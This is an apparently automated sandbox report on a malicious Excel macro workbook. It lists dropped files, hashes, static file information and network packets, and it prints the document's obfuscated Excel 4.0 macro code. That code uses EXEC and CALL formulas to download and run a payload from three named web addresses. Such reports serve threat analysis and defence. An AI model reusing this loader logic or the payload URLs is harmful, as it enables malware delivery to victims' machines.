                                                                                          SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
                                                                                          SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
                                                                                          SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
                                                                                          Malicious:false
                                                                                          Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
                                                                                          C:\Users\user\AppData\Local\Temp\84DE0000
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):109574
                                                                                          Entropy (8bit):7.901687003989273
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:HTsW9EtNThPCJ3pn/dDuL7QQ64eyZJViW++poHnVbQqo6d6EnRm55WfV:HTsWAo5wXQQteyZJAW++4Vcqo6nmjWt
                                                                                          MD5:841A41EBD5C3DC60FCB89957FCCA3A45
                                                                                          SHA1:3688D4F7363D9E5B9801315D0BDEC9D2313A46AC
                                                                                          SHA-256:9C48EC66E39C1BC9904DD7450A7C13BBA37E9643791BBD1C18095742951DD9AA
                                                                                          SHA-512:4B30C160D9EFB12FBE7626F7BE076D0C1DCED75CEFF37E9A57259828F1A32180129AFDF052E31F1B73C021A2A13D9636BB766D1B9C90A7BB2A6ADAD74BB5A954
                                                                                          Malicious:false
                                                                                          Preview: .T.N.0..#....(qaq.PS.\..|.kO..~.c..{.n(P....<...gfz...z.....6.V..^i...._}.*L.)a.........hz........O)\p...+.....,|.".k.x.r):.g.....K.R.2..M..B<.T].hy.d....6.e......".Q...H...-Ay.h....A(...5M......D.!.{5..v4....~D..;...C..!K)..'..'.y......:...T."..a)-.2......es.$.i.......+d..N..........D^n._.....>.\I!..Q|.F....l..7...D.;.r.y.fD.....r...1.^DPw....u..G|.(...><.<....M.........._{>..@D...m..."......B.cU..............PK..........!................[Content_Types].xml ...(..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          C:\Users\user\AppData\Local\Temp\CabDF29.tmp
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                                                          Category:dropped
                                                                                          Size (bytes):58596
                                                                                          Entropy (8bit):7.995478615012125
                                                                                          Encrypted:true
                                                                                          SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                                                          MD5:61A03D15CF62612F50B74867090DBE79
                                                                                          SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                                                          SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                                                          SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                                                          Malicious:false
                                                                                          Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                                                          C:\Users\user\AppData\Local\Temp\TarDF2A.tmp
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):152788
                                                                                          Entropy (8bit):6.309740459389463
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:TIz6c7xcjgCyrYBZ5pimp4Ydm6Caku2Dnsz0JD8reJgMnl3rlMGGv:TNqccCymfdmoku2DMykMnNGG0
                                                                                          MD5:4E0487E929ADBBA279FD752E7FB9A5C4
                                                                                          SHA1:2497E03F42D2CBB4F4989E87E541B5BB27643536
                                                                                          SHA-256:AE781E4F9625949F7B8A9445B8901958ADECE7E3B95AF344E2FCB24FE989EEB7
                                                                                          SHA-512:787CBC262570A4FA23FD9C2BA6DA7B0D17609C67C3FD568246F9BEF2A138FA4EBCE2D76D7FD06C3C342B11D6D9BCD875D88C3DC450AE41441B6085B2E5D48C5A
                                                                                          Malicious:false
                                                                                          Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........|h....210303062855Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Apr 21 17:14:39 2021, atime=Wed Apr 21 17:14:39 2021, length=8192, window=hide
                                                                                          Category:dropped
                                                                                          Size (bytes):867
                                                                                          Entropy (8bit):4.490589514520792
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:85QMKLgXg/XAlCPCHaXtB8XzB/My0xX+WnicvbIFbDtZ3YilMMEpxRljKyTdJP9O:85D8/XTd6jdCYeE5Dv3q3rNru/
                                                                                          MD5:26DB6573E037895CCA83F2123D813D52
                                                                                          SHA1:D836896CFE3458BB8F0D58F8BABACCA61C0758F7
                                                                                          SHA-256:33B02804DE396C58B89A8AD43F25491905041BE6AAD61D700E99996A43A14318
                                                                                          SHA-512:41DDD188A9E5665423F0B2819A1B60D6A5FCF7D03BCE6669ED6575B7932592BD74A676F41D20E0B63D3D5D249D5C5F79013ECC4B91C184463FB63CBE993B3BC9
                                                                                          Malicious:false
                                                                                          Preview: L..................F...........7G.....1.6.....1.6... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R...Desktop.d......QK.X.R.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\414408\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......414408..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\catalog-1715742540.LNK
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Apr 21 17:14:39 2021, atime=Wed Apr 21 17:14:39 2021, length=109574, window=hide
                                                                                          Category:dropped
                                                                                          Size (bytes):4236
                                                                                          Entropy (8bit):4.542862923233071
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:8A/XojFE7OV3Qh2A/XojFE7OV3Qh2A/XojFE7OV3Qh2A/XojFE7OV3Q/:8djFtQEdjFtQEdjFtQEdjFtQ/
                                                                                          MD5:8AEF93849A487D795D370BC8389CB807
                                                                                          SHA1:9ECE024AD0DA7FC998BE2EF084AA7E42D37AEE3E
                                                                                          SHA-256:5D23CD2C7F06EA499F4137510592C05854035AE5851EEAB330AD54B6DF884554
                                                                                          SHA-512:E558CDF96FFDA8771D76C2EF02E8916AD41575974E99D8F4BADA775C07AA4FBABD43411ED35EBA2F16042EE56FF73E15131877D70239C86C815DF3A1A06EC83C
                                                                                          Malicious:false
                                                                                          Preview: L..................F.... ....Fn..{.....1.6...6.1.6...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2. ....R. .CATALO~1.XLS..\.......Q.y.Q.y*...8.....................c.a.t.a.l.o.g.-.1.7.1.5.7.4.2.5.4.0...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\414408\Users.user\Desktop\catalog-1715742540.xlsm.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.c.a.t.a.l.o.g.-.1.7.1.5.7.4.2.5.4.0...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......414408..........D_....3N.
                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):229
                                                                                          Entropy (8bit):4.610266540968001
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:dj+1sLFZjsLFA1sLFZjsLFA1sLFZjsLFA1sLFc:dC2cO2cO2cO2C
                                                                                          MD5:6E37BE33EC994DEAA29AC8E1E28AE3DC
                                                                                          SHA1:411B59DE83321B1722C63DFEA779D3179EBAF959
                                                                                          SHA-256:C2C64FEB92402AAFC0690D2658ED1B83E6EDCB51958C62DAEB103F210396FF81
                                                                                          SHA-512:399BCB488FD331F5DD382CADB0AC24270A0D75A4218FE04BAC58DC60AF57D1DD2750478214427AAB6F534D9AE937F63E5B85587C14E946622EB544D2E3460E2B
                                                                                          Malicious:false
                                                                                          Preview: Desktop.LNK=0..[misc]..catalog-1715742540.LNK=0..catalog-1715742540.LNK=0..[misc]..catalog-1715742540.LNK=0..catalog-1715742540.LNK=0..[misc]..catalog-1715742540.LNK=0..catalog-1715742540.LNK=0..[misc]..catalog-1715742540.LNK=0..
                                                                                          C:\Users\user\Desktop\75DE0000
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):109574
                                                                                          Entropy (8bit):7.901687003989273
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:HTsW9EtNThPCJ3pn/dDuL7QQ64eyZJViW++poHnVbQqo6d6EnRm55WfV:HTsWAo5wXQQteyZJAW++4Vcqo6nmjWt
                                                                                          MD5:841A41EBD5C3DC60FCB89957FCCA3A45
                                                                                          SHA1:3688D4F7363D9E5B9801315D0BDEC9D2313A46AC
                                                                                          SHA-256:9C48EC66E39C1BC9904DD7450A7C13BBA37E9643791BBD1C18095742951DD9AA
                                                                                          SHA-512:4B30C160D9EFB12FBE7626F7BE076D0C1DCED75CEFF37E9A57259828F1A32180129AFDF052E31F1B73C021A2A13D9636BB766D1B9C90A7BB2A6ADAD74BB5A954
                                                                                          Malicious:false
                                                                                          Preview: .T.N.0..#....(qaq.PS.\..|.kO..~.c..{.n(P....<...gfz...z.....6.V..^i...._}.*L.)a.........hz........O)\p...+.....,|.".k.x.r):.g.....K.R.2..M..B<.T].hy.d....6.e......".Q...H...-Ay.h....A(...5M......D.!.{5..v4....~D..;...C..!K)..'..'.y......:...T."..a)-.2......es.$.i.......+d..N..........D^n._.....>.\I!..Q|.F....l..7...D.;.r.y.fD.....r...1.^DPw....u..G|.(...><.<....M.........._{>..@D...m..."......B.cU..............PK..........!................[Content_Types].xml ...(..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          C:\Users\user\Desktop\~$catalog-1715742540.xlsm
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):495
                                                                                          Entropy (8bit):1.4377382811115937
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:vZ/FFDJw2fj/FFDJw2fj/FFDJw2fV:vBFFGaFFGaFFGS
                                                                                          MD5:98D7F9B901C91608CD7EA5509662BBCA
                                                                                          SHA1:F166635CE572B615A1D80076A1AE8DE9220473CF
                                                                                          SHA-256:F07A8B18E5B50003C42020241E82DDCCFBE254236AF2678C3CEFA4709100F4FE
                                                                                          SHA-512:5536FD72C18081A1CFB46EB2E311BB257764C53B293E0D4B90F9C6C5EFB00E5A3A28190A2D04F3EE2819CF8DC7EBA7747DC8E8910C8716ACA7BAED0532142D1C
                                                                                          Malicious:true
                                                                                          Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:Microsoft Excel 2007+
                                                                                          Entropy (8bit):7.902484703277508
                                                                                          TrID:
                                                                                          • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                                          • ZIP compressed archive (8000/1) 16.67%
                                                                                          File name:catalog-1715742540.xlsm
                                                                                          File size:109600
                                                                                          MD5:4db94c8af1408627aa75f2a27e24bc78
                                                                                          SHA1:f7d30b96ed74932162fe8e6be4c486a98b2aa8dd
                                                                                          SHA256:27f45562827b17d609222b0e0619fb3cd726fb1944722a009e869ae15dad7d00
                                                                                          SHA512:eb761fd31c72edbd734d9e69c0dd0a84d4353179d6dd6de6f963974030e18afcaf024193ed6207153e6dfdf072e7df364a906b9753ad2b266d88d52167302338
                                                                                          SSDEEP:1536:1HF0pEtNThPCJ3Un/dDuL7QQ64eyZJViW++poHnUO7zojnGy3Te6VNfe4:1HjokwXQQteyZJAW++4et/NN
                                                                                          File Content Preview:PK..........!.................[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                          File Icon

                                                                                          Icon Hash:e4e2aa8aa4bcbcac

                                                                                          Static OLE Info

                                                                                          General

                                                                                          Document Type:OpenXML
                                                                                          Number of OLE Files:1

                                                                                          OLE File "catalog-1715742540.xlsm"

                                                                                          Indicators

                                                                                          Has Summary Info:
                                                                                          Application Name:
                                                                                          Encrypted Document:
                                                                                          Contains Word Document Stream:
                                                                                          Contains Workbook/Book Stream:
                                                                                          Contains PowerPoint Document Stream:
                                                                                          Contains Visio Document Stream:
                                                                                          Contains ObjectPool Stream:
                                                                                          Flash Objects Count:
                                                                                          Contains VBA Macros:

                                                                                          Macro 4.0 Code

                                                                                          ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,r,",",U,J,,,=CHAR(85),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,u,D,R,J,,,R,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""..\ghnrope.ito""",,n,ll,L,C,,,L,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,d,l,D,C,,,M,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,R,o,B,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,e,w,B,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,3,g,n,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,i,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,s,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,t,a,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,e,d,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(before.2.0.0.sheet!AM34&before.2.0.0.sheet!AO5&""1""&before.2.0.0.sheet!AM35)",,,r,T,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(before.2.0.0.sheet!AM34&before.2.0.0.sheet!AO5&""2""&before.2.0.0.sheet!AM35)",,,Se,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(before.2.0.0.sheet!AM34&before.2.0.0.sheet!AO5&""3""&before.2.0.0.sheet!AM35)",,,rv,F,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,er,i,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,e,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,http://onellahardware.com/drms/alpa.html,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,https://habitosdosucesso.net/drms/alpa.html,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,https://upesagh.com/drms/alpa.html,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(before.2.0.0.sheet!AM31&""n"",before.2.0.0.sheet!AM32&""A"",before.2.0.0.sheet!AM30,before.2.0.0.sheet!AT13,AW24,before.2.0.0.sheet!AO5&""1"",0,0)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(before.2.0.0.sheet!AM31&""n"",before.2.0.0.sheet!AM32&""A"",before.2.0.0.sheet!AM30,before.2.0.0.sheet!AT13,AW25,before.2.0.0.sheet!AO5&""2"",0,0)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(before.2.0.0.sheet!AM31&""n"",before.2.0.0.sheet!AM32&""A"",before.2.0.0.sheet!AM30,before.2.0.0.sheet!AT13,AW26,before.2.0.0.sheet!AO5&""3"",0,0)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=SET.VALUE(AM30,AT3&AT4&AT5&AT6&AT7&AT8)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=SET.VALUE(AM31,AW3&AW4&AW5&AW6&AW7)",,,"=WORKBOOK.HIDE(""Sheet1"",1)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=SET.VALUE(AM32,AS3&AS4&AS5&AS6&AS7&AS8&AS9&AS10&AS11&AS12&AS13&AS14&AS15&AS16&AS17&AS18&AS19)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AO12(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=SET.VALUE(AM34,before.2.0.0.sheet!AQ3&before.2.0.0.sheet!AQ4&before.2.0.0.sheet!AQ5&before.2.0.0.sheet!AQ6&before.2.0.0.sheet!AQ7&before.2.0.0.sheet!AQ8&before.2.0.0.sheet!AQ9&""2 "")",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                                                                                          Network Behavior

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Apr 21, 2021 11:15:12.525748014 CEST4916580192.168.2.22216.244.65.162
                                                                                          Apr 21, 2021 11:15:12.732630014 CEST8049165216.244.65.162192.168.2.22
                                                                                          Apr 21, 2021 11:15:12.732857943 CEST4916580192.168.2.22216.244.65.162
                                                                                          Apr 21, 2021 11:15:12.734318018 CEST4916580192.168.2.22216.244.65.162
                                                                                          Apr 21, 2021 11:15:12.942554951 CEST8049165216.244.65.162192.168.2.22
                                                                                          Apr 21, 2021 11:15:13.129909039 CEST8049165216.244.65.162192.168.2.22
                                                                                          Apr 21, 2021 11:15:13.130172014 CEST4916580192.168.2.22216.244.65.162
                                                                                          Apr 21, 2021 11:15:13.322999001 CEST49166443192.168.2.22198.50.218.68
                                                                                          Apr 21, 2021 11:15:13.454933882 CEST44349166198.50.218.68192.168.2.22
                                                                                          Apr 21, 2021 11:15:13.455156088 CEST49166443192.168.2.22198.50.218.68
                                                                                          Apr 21, 2021 11:15:13.465953112 CEST49166443192.168.2.22198.50.218.68
                                                                                          Apr 21, 2021 11:15:13.597700119 CEST44349166198.50.218.68192.168.2.22
                                                                                          Apr 21, 2021 11:15:13.599407911 CEST44349166198.50.218.68192.168.2.22
                                                                                          Apr 21, 2021 11:15:13.599522114 CEST44349166198.50.218.68192.168.2.22
                                                                                          Apr 21, 2021 11:15:13.599548101 CEST44349166198.50.218.68192.168.2.22
                                                                                          Apr 21, 2021 11:15:13.599611044 CEST49166443192.168.2.22198.50.218.68
                                                                                          Apr 21, 2021 11:15:13.599647999 CEST49166443192.168.2.22198.50.218.68
                                                                                          Apr 21, 2021 11:15:13.599729061 CEST44349166198.50.218.68192.168.2.22
                                                                                          Apr 21, 2021 11:15:13.599786043 CEST49166443192.168.2.22198.50.218.68
                                                                                          Apr 21, 2021 11:15:13.610378027 CEST49166443192.168.2.22198.50.218.68
                                                                                          Apr 21, 2021 11:15:13.742486954 CEST44349166198.50.218.68192.168.2.22
                                                                                          Apr 21, 2021 11:15:13.742640018 CEST49166443192.168.2.22198.50.218.68
                                                                                          Apr 21, 2021 11:15:14.805793047 CEST49166443192.168.2.22198.50.218.68
                                                                                          Apr 21, 2021 11:15:14.976871967 CEST44349166198.50.218.68192.168.2.22
                                                                                          Apr 21, 2021 11:15:15.090342999 CEST44349166198.50.218.68192.168.2.22
                                                                                          Apr 21, 2021 11:15:15.090488911 CEST49166443192.168.2.22198.50.218.68
                                                                                          Apr 21, 2021 11:15:15.090524912 CEST44349166198.50.218.68192.168.2.22
                                                                                          Apr 21, 2021 11:15:15.090569973 CEST49166443192.168.2.22198.50.218.68
                                                                                          Apr 21, 2021 11:15:15.090687037 CEST44349166198.50.218.68192.168.2.22
                                                                                          Apr 21, 2021 11:15:15.090733051 CEST49166443192.168.2.22198.50.218.68
                                                                                          Apr 21, 2021 11:15:15.090751886 CEST49166443192.168.2.22198.50.218.68
                                                                                          Apr 21, 2021 11:15:15.090802908 CEST49166443192.168.2.22198.50.218.68
                                                                                          Apr 21, 2021 11:15:15.130106926 CEST8049165216.244.65.162192.168.2.22
                                                                                          Apr 21, 2021 11:15:15.130182028 CEST4916580192.168.2.22216.244.65.162
                                                                                          Apr 21, 2021 11:15:15.222791910 CEST44349166198.50.218.68192.168.2.22
                                                                                          Apr 21, 2021 11:15:15.222966909 CEST49166443192.168.2.22198.50.218.68
                                                                                          Apr 21, 2021 11:15:15.458692074 CEST49168443192.168.2.2275.119.136.137
                                                                                          Apr 21, 2021 11:15:15.506143093 CEST4434916875.119.136.137192.168.2.22
                                                                                          Apr 21, 2021 11:15:15.506335020 CEST49168443192.168.2.2275.119.136.137
                                                                                          Apr 21, 2021 11:15:15.507272959 CEST49168443192.168.2.2275.119.136.137
                                                                                          Apr 21, 2021 11:15:15.554455042 CEST4434916875.119.136.137192.168.2.22
                                                                                          Apr 21, 2021 11:15:15.559911013 CEST4434916875.119.136.137192.168.2.22
                                                                                          Apr 21, 2021 11:15:15.559942961 CEST4434916875.119.136.137192.168.2.22
                                                                                          Apr 21, 2021 11:15:15.559954882 CEST4434916875.119.136.137192.168.2.22
                                                                                          Apr 21, 2021 11:15:15.560039997 CEST49168443192.168.2.2275.119.136.137
                                                                                          Apr 21, 2021 11:15:15.564172983 CEST49168443192.168.2.2275.119.136.137
